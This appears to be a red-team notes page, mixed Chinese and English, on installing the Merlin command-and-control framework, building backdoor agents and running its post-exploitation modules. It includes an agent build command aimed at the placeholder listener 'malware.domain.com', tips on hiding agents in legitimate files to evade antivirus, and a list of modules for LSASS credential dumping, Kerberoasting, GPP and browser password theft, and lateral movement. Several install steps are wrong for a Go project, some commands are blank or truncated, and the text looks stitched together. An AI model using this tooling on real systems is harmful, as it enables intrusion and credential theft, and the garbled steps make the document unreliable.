2023-08-03 19:12:22 +00:00

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#Download GO package from: https://golang.org/dl/
#Decompress the packe using:
tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz

#Change /etc/profile
Add ":/usr/local/go/bin" to PATH
Add "export GOPATH=$HOME/go"
Add "export GOBIN=$GOPATH/bin"

source /etc/profile


To install Merlin, follow these steps:

  1. Clone the Merlin repository from GitHub:

    git clone https://github.com/Ne0nd0g/merlin.git
  2. Change into the Merlin directory:

    cd merlin
  3. Install the required dependencies:

    pip install -r requirements.txt
  4. Run the setup script:

    python setup.py install
  5. Verify that Merlin is installed correctly by running the following command:

    merlin --help

    If you see the help menu, then Merlin is installed successfully.

Congratulations! You have successfully installed Merlin on your system. You can now proceed to use its powerful backdoor capabilities for your penetration testing activities.

go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/


To launch the Merlin server, follow these steps:

  1. Download the Merlin server package from the official website.

  2. Extract the contents of the package to a directory of your choice.

  3. Open a terminal or command prompt and navigate to the directory where you extracted the package.

  4. Run the following command to start the Merlin server:


    If you encounter any permission issues, you may need to use sudo or run the command as an administrator.

  5. The Merlin server should now be running and listening for incoming connections on the default port (usually 8080). You can access the server by opening a web browser and entering the server's IP address followed by the port number.

    For example:

    Note: Make sure to replace with the actual IP address of your Merlin server.

  6. You will be prompted to set up an initial admin account and configure other settings. Follow the on-screen instructions to complete the setup process.

Congratulations! You have successfully launched the Merlin server. You can now use it to manage and control your backdoor implants.

go run cmd/merlinserver/main.go -i




转到主文件夹 $GOPATH/src/github.com/Ne0nd0g/merlin/

#User URL param to set the listener URL
make #Server and Agents of all
make windows #Server and Agents for Windows
make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)


In some cases, you may need to manually compile an agent program to create a custom backdoor. This can be useful when you want to avoid detection by antivirus software or when you need to tailor the backdoor to specific requirements.


  1. 选择合适的编程语言选择一种适合你的需求的编程语言如C、C++、Python等。

  2. 编写代理程序代码:根据你的需求编写代理程序的代码。确保代码实现了所需的功能,如远程访问、文件传输等。

  3. 编译代理程序:使用编程语言的编译器将代理程序代码编译成可执行文件。确保编译过程没有错误。

  4. 测试代理程序:在安全环境中测试代理程序,确保它按预期工作并没有引起异常。

  5. 隐藏代理程序:使用技术手段将代理程序隐藏在合法的文件或进程中,以避免被检测到。

  6. 部署代理程序:将编译好的代理程序部署到目标系统中,并确保它能够在后台运行。


GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=" -o agent.exe main.g


坏消息是Merlin使用的每个模块都是从源代码Github下载并保存在磁盘上然后再使用。在使用知名模块时要小心因为Windows Defender会发现你

SafetyKatz --> 修改版的Mimikatz。将LSASS转储到文件并启动sekurlsa::logonpasswords以将其写入该文件
SharpDump --> 为指定的进程ID进行minidump默认为LSASS最终文件的扩展名是.gz但实际上是.bin但是是一个gz文件
SharpRoast --> Kerberoast不起作用
SeatBelt --> CS中的本地安全性测试不起作用https://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs
Compiler-CSharp --> 使用csc.exe /unsafe进行编译
Sharp-Up --> 在powerup中使用C#进行所有检查(起作用)
Inveigh --> PowerShellADIDNS/LLMNR/mDNS/NBNS欺骗和中间人工具不起作用需要加载https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
Invoke-InternalMonologue --> 模拟所有可用用户并为每个用户检索挑战-响应每个用户的NTLM哈希错误的URL
Invoke-PowerThIEf --> 从IExplorer窃取表单或使其执行JS或在该进程中注入DLL不起作用而且PS看起来也不起作用https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1
LaZagneForensic --> 获取浏览器密码(起作用,但不打印输出目录)
dumpCredStore --> Win32凭据管理器APIhttps://github.com/zetlen/clortho/blob/master/CredMan.ps1https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details
Get-InjectedThread --> 检测正在运行的进程中的经典注入经典注入OpenProcessVirtualAllocExWriteProcessMemoryCreateRemoteThread不起作用
Get-OSTokenInformation --> 获取正在运行的进程和线程的令牌信息(用户、组、特权、所有者...https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-_token_information_class
Invoke-DCOM --> 通过DCOM在其他计算机上执行命令http://www.enigma0x3.net.https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
Invoke-DCOMPowerPointPivot --> 滥用PowerPoint COM对象ADDin在其他计算机上执行命令
Invoke-ExcelMacroPivot --> 滥用Excel中的DCOM在其他计算机上执行命令
Find-ComputersWithRemoteAccessPolicies -->(不起作用)(https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/
Grouper --> 它转储了组策略的所有最有趣的部分然后在其中寻找可利用的东西。已弃用看看Grouper2看起来非常好
Invoke-WMILM --> 使用WMI进行横向移动
Get-GPPPassword --> 查找groups.xml、scheduledtasks.xml、services.xml和datasources.xml并返回明文密码在域内
Invoke-Mimikatz --> 使用mimikatz默认转储凭证
PowerUp --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Find-BadPrivilege --> 检查计算机上用户的特权
Find-PotentiallyCrackableAccounts --> 检索与SPN关联的用户帐户的信息Kerberoasting
psgetsystem --> getsystem




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